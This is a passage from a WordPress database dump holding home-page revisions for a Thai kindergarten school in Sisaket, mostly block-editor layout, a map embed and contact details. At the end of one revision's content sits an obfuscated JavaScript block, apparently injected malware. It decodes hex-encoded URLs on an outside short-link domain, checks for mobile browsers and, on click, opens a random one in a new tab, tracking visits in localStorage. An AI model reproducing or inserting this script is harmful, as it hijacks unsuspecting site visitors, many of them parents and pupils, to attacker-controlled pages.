on\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 11:36:50','2024-08-28 04:36:50','',19,'http://watprato.ssk.in.th/?p=243',0,'revision','',0),
(244,2,'2024-08-28 11:39:22','2024-08-28 04:39:22','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" 